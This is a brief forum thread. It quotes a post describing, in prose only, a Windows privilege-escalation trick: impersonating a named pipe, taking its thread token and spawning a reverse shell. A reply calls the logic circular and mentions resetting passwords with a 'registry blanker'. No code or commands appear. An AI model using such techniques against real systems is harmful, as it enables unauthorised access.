[August]

Quote:

Originally Posted by r00t [You must be logged in to view images. Log in or Register.]

You can hack windows rather easily without knowing the root password or stealing the hash from memory (lol windows unsalted passwords 2014)

Basically create a named pipe from something with system level privileges, impersonate the pipe, open the thread token, and then spawn a reverse shell with it.

Sources:
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx

Isn't this logic flawed with the 'create a named pipe from something with system level privileges'? You don't need to hack a box you're on if you already have system level privileges.

A much easier method is to just use a registry blanker. It's how I got into all my dad's stuff after he died.